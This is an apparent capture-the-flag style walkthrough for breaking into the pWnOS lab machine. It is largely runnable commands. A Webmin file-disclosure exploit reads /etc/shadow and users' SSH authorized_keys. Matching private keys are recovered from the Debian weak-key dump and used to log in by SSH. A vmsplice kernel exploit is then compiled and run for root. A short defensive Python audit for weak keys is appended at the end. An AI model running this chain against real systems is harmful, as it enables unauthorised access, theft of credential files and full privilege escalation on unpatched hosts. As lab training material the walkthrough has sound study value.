Hacking the pWnOS system using BackTrack
Stage 1: Footprinting (identifying live systems)

    nmap 192.168.1.1-255

Stage 2: Scanning / banner grabbing (service and version identification)

    nmap -sV -sS -O 192.168.1.89

Ports 10000 (Webmin) and 22 (Debian OpenSSH / OpenSSL) are listening, so we will search for vulnerabilities related to those two services. Browse www.exploit-db.com and search for Webmin and OpenSSL.

Stage 3: Gaining access

Download the Webmin exploit code (Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)) from http://www.exploit-db.com/exploits/2017/ and make it an executable file. Execute the Webmin exploit with the following syntax:

    perl webmin.pl 192.168.1.89 10000 /etc/shadow 0

We will observe that the victim system contains users named vmware, obama, osama and yomama. Save the output to a file. Using the same file disclosure vulnerability, extract the authorized keys of the vmware, obama, osama and yomama users:

    perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
    perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
    perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
    perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys

Save the output of these commands to a file.

Next, make use of the OpenSSL vulnerability that allows the RSA keys to be recovered. Download the RSA 2048 key dump from http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 with the help of wget:

    wget http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

Extract the contents of the tarball with the following commands:

    tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
    cd rsa/2048

Scan the dump for each public key with grep (the pattern is the key string taken from the authorized_keys output; -l prints the name of the matching file and -r searches recursively):

    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub

    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub

Save the matching keys and use them for ssh authentication:

    ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 [email protected]
    exit

or, for the vmware user:

    ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 [email protected]
    hostname
    uname -a / uname -r

We will observe that the system is running Linux kernel 2.6.17. Search for a privilege escalation vulnerability affecting Linux kernel 2.6.17.

Stage 4: Privilege escalation

Visit www.exploit-db.com, search for Linux kernel 2.6 and download the exploit code (Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit) from http://www.exploit-db.com/exploits/5092/ . Save the file with .c as the extension:

    nano vmsplice.c

Compile the C program with gcc and execute it:

    gcc vmsplice.c -o vmsplice
    ./vmsplice
    whoami
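The grep step in Stage 3 works because every key from the Debian weak-key dump is known in advance, which is also what makes such keys detectable on the defending side. As an added example that is not part of the original walkthrough, the audit below parses an authorized_keys file, fingerprints each key the way OpenSSH displays it, reports the RSA modulus size (so the right key-size blacklist is consulted) and flags entries whose fingerprint is on a blacklist of known-weak keys. The sample keys, the blacklist contents and the user names are constructed for the example; a real audit would load the fingerprints of every key in the public dump.

```python
import base64
import hashlib

def _sstr(data: bytes) -> bytes:        # SSH wire string: big-endian uint32 length + bytes
    return len(data).to_bytes(4, "big") + data
def _rstr(blob: bytes, pos: int):       # read one SSH string at pos -> (bytes, next_pos)
    ln = int.from_bytes(blob[pos:pos + 4], "big")
    return blob[pos + 4:pos + 4 + ln], pos + 4 + ln
def rsa_blob(e: int, n: int) -> bytes:
    """Build an OpenSSH ssh-rsa public-key blob (type, mpint e, mpint n); used for samples."""
    def mpint(v):
        raw = v.to_bytes((v.bit_length() + 7) // 8, "big")
        return _sstr((b"\x00" if raw and raw[0] & 0x80 else b"") + raw)  # mpints are signed
    return _sstr(b"ssh-rsa") + mpint(e) + mpint(n)
def fingerprint(blob: bytes) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of SHA-256 over the blob."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
def parse_authorized_keys(text: str) -> list:
    """Return (keytype, fingerprint, rsa_modulus_bits, comment) per valid key line; skips
    comments and blank lines and tolerates a leading options field (no embedded spaces)."""
    out = []
    for line in text.splitlines():
        f = line.split()
        if not f or f[0].startswith("#"):
            continue
        i = next((k for k, t in enumerate(f) if t.startswith(("ssh-", "ecdsa-"))), None)
        if i is None or i + 1 >= len(f):
            continue
        try:
            blob = base64.b64decode(f[i + 1], validate=True)
        except ValueError:
            continue                                  # undecodable blob: do not trust the line
        kind, pos = _rstr(blob, 0)
        if kind != f[i].encode():
            continue                                  # declared type and blob disagree
        bits = None
        if kind == b"ssh-rsa":
            _, pos = _rstr(blob, pos)                 # public exponent e
            n, _ = _rstr(blob, pos)                   # modulus n
            bits = int.from_bytes(n, "big").bit_length()
        out.append((f[i], fingerprint(blob), bits, " ".join(f[i + 2:])))
    return out
def find_weak_keys(text: str, blacklist: set) -> list:
    # Entries whose fingerprint is in a blacklist of known-weak public keys.
    return [e for e in parse_authorized_keys(text) if e[1] in blacklist]
# Constructed sample (assumed, not real keys; the tiny moduli are for illustration only).
WEAK_BLOB = rsa_blob(65537, 0xC0FFEE1234567891)   # stands in for a key from the weak-key dump
SAMPLE = "\n".join(["# constructed authorized_keys",
    "ssh-rsa " + base64.b64encode(WEAK_BLOB).decode() + " vmware@lab",
    'from="10.0.0.0/8" ssh-rsa ' + base64.b64encode(rsa_blob(65537, 0xDEADBEEFCAFEF00D1)).decode() + " admin"])
BLACKLIST = {fingerprint(WEAK_BLOB)}   # a real audit loads the fingerprints of every dumped key
```

Running find_weak_keys(SAMPLE, BLACKLIST) on the constructed file returns only the vmware entry; the modulus sizes reported (64 and 68 bits here) would be 2048 for keys matching the dump used in the walkthrough.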